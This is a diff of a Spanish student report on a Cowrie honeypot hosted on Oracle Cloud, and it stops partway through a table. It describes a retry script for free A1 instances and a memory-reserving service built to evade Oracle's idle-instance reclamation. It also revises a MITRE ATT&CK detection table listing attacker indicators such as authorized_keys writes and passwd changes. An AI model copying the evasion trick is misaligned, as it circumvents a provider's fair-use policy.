--- a/docs/Memoria_PIASIR_Diego_Perez_Fonterosa.docx
+++ b/docs/Memoria_PIASIR_Diego_Perez_Fonterosa.docx
@@ -11984,6 +11984,101 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Disponibilidad de Capacidad</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Las instancias A1.Flex gratuitas son muy demandadas y la región de Madrid respondía de forma sistemática con el error «Out of host capacity». Se valoraron tres alternativas: la instancia gratuita VM.Standard.E2.1.Micro (AMD, 1 GB de RAM), que no aparecía disponible para la cuenta en esa región; el paso a una cuenta Pay As You Go, descartado por exigir una retención temporal de unos 93 € en la tarjeta; y la creación automatizada de la instancia mediante la API de OCI. Se optó por la tercera: el script oci_a1_retry.py, desarrollado con el SDK oficial de Oracle para Python, localiza el dominio de disponibilidad, la imagen Ubuntu 24.04 ARM y la subnet pública, y solicita la instancia cada minuto hasta que hay capacidad, respetando los avisos de limitación de peticiones de la API.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Recuperación de Instancias Ociosas</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Oracle se reserva el derecho de recuperar las instancias Always Free que considera ociosas: aquellas que durante 7 días mantienen a la vez un uso de CPU inferior al 20 % (percentil 95), un uso de red inferior al 20 % y, en las instancias A1, un uso de memoria inferior al 20 % (Oracle, s. f.-a). Un honeypot de media interacción cumple las tres condiciones, ya que Cowrie consume muy pocos recursos, por lo que la instancia corría el riesgo de ser recuperada en mitad del periodo de captura.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Dado que las tres condiciones deben cumplirse simultáneamente, basta con evitar una de ellas. Se desarrolló un pequeño servicio, oci-keepalive, que reserva el 25 % de la memoria RAM y la mantiene ocupada sin consumir CPU. El servicio se ejecuta con un usuario efímero sin privilegios, sin acceso a la red ni al sistema de ficheros, y con el uso de swap deshabilitado para garantizar que la reserva permanezca en memoria física. Se descartó la alternativa de generar carga de CPU artificial por ser un consumo innecesario de recursos compartidos.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading2"/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
         <w:jc w:val="left"/>
@@ -16662,6 +16757,38 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">Oracle Corporation. (s. f.). Oracle Cloud Free Tier. https://www.oracle.com/cloud/free/</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Límites del tier Always Free y política de recuperación de instancias ociosas.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="200" w:line="360"/>
+        <w:ind w:left="709" w:hanging="709"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Oracle. (s. f.-a). Always Free resources. Oracle Cloud Infrastructure Documentation. https://docs.oracle.com/en-us/iaas/Content/FreeTier/freetier_topic-Always_Free_Resources.htm</w:t>
       </w:r>
     </w:p>
     <w:p>

--- a/docs/Memoria_PIASIR_Diego_Perez_Fonterosa.docx
+++ b/docs/Memoria_PIASIR_Diego_Perez_Fonterosa.docx
@@ -14847,7 +14847,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Mapeo MITRE ATT&amp;CK Esperado</w:t>
+        <w:t xml:space="preserve">Catálogo de Técnicas MITRE ATT&amp;CK</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -14866,7 +14866,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">A partir de la literatura y de los datos simulados, se anticipa que los ataques capturados se mapearán a las siguientes técnicas del marco MITRE ATT&amp;CK:</w:t>
+        <w:t xml:space="preserve">La clasificación de la actividad se automatiza con el módulo mitre_mapping.py, descrito en el capítulo de Implementación. La tabla siguiente recoge su catálogo de reglas: las técnicas que el clasificador es capaz de reconocer y los indicadores que busca en los logs de Cowrie. Los identificadores se han comprobado contra la web oficial de MITRE ATT&amp;CK.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -14882,15 +14882,18 @@
         </w:tblBorders>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="1588"/>
-        <w:gridCol w:w="2381"/>
-        <w:gridCol w:w="953"/>
-        <w:gridCol w:w="3016"/>
+        <w:gridCol w:w="1349"/>
+        <w:gridCol w:w="2699"/>
+        <w:gridCol w:w="1270"/>
+        <w:gridCol w:w="2620"/>
       </w:tblGrid>
       <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="pct" w:w="1000"/>
+        <w:trPr>
+          <w:tblHeader/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="850"/>
             <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
@@ -14913,7 +14916,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="pct" w:w="1500"/>
+            <w:tcW w:type="pct" w:w="1700"/>
             <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
@@ -14936,14 +14939,14 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="pct" w:w="600"/>
+            <w:tcW w:type="pct" w:w="800"/>
             <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
               <w:spacing w:line="276"/>
-              <w:jc w:val="center"/>
+              <w:jc w:val="left"/>
             </w:pPr>
             <w:r>
               <w:rPr>
@@ -14959,7 +14962,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:type="pct" w:w="1900"/>
+            <w:tcW w:type="pct" w:w="1650"/>
             <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
@@ -14976,7 +14979,7 @@
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
-              <w:t xml:space="preserve">Evidencia esperada</w:t>
+              <w:t xml:space="preserve">Indicadores en los logs</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -14984,6 +14987,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
+            <w:tcW w:type="pct" w:w="850"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -15005,64 +15009,67 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="276"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Brute Force: Password Guessing</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="276"/>
-              <w:jc w:val="center"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">T1110.001</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="276"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Eventos cowrie.login.failed masivos</w:t>
+            <w:tcW w:type="pct" w:w="1700"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Valid Accounts: Local Accounts</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="800"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">T1078.003</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1650"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Evento cowrie.login.success</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -15070,85 +15077,89 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="276"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Initial Access</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="276"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Valid Accounts: Default Accounts</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="276"/>
-              <w:jc w:val="center"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">T1078.001</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="276"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Logins con root/admin y passwords triviales</w:t>
+            <w:tcW w:type="pct" w:w="850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Execution</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1700"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Command and Scripting Interpreter: Unix Shell</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="800"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">T1059.004</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1650"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Cualquier evento cowrie.command.input</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -15156,85 +15167,89 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="276"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Execution</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="276"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Command and Scripting Interpreter: Unix Shell</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="276"/>
-              <w:jc w:val="center"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">T1059.004</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="276"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Eventos cowrie.command.input</w:t>
+            <w:tcW w:type="pct" w:w="850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Persistence</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1700"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Account Manipulation: SSH Authorized Keys</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="800"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">T1098.004</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1650"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Escritura en authorized_keys</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -15242,85 +15257,89 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="276"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Discovery</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="276"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">System Information Discovery</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="276"/>
-              <w:jc w:val="center"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">T1082</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="276"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Comandos uname -a, cat /proc/cpuinfo</w:t>
+            <w:tcW w:type="pct" w:w="850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Persistence</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1700"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Account Manipulation</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="800"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">T1098</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1650"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">chpasswd, passwd, usermod</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -15328,85 +15347,89 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="276"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Discovery</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
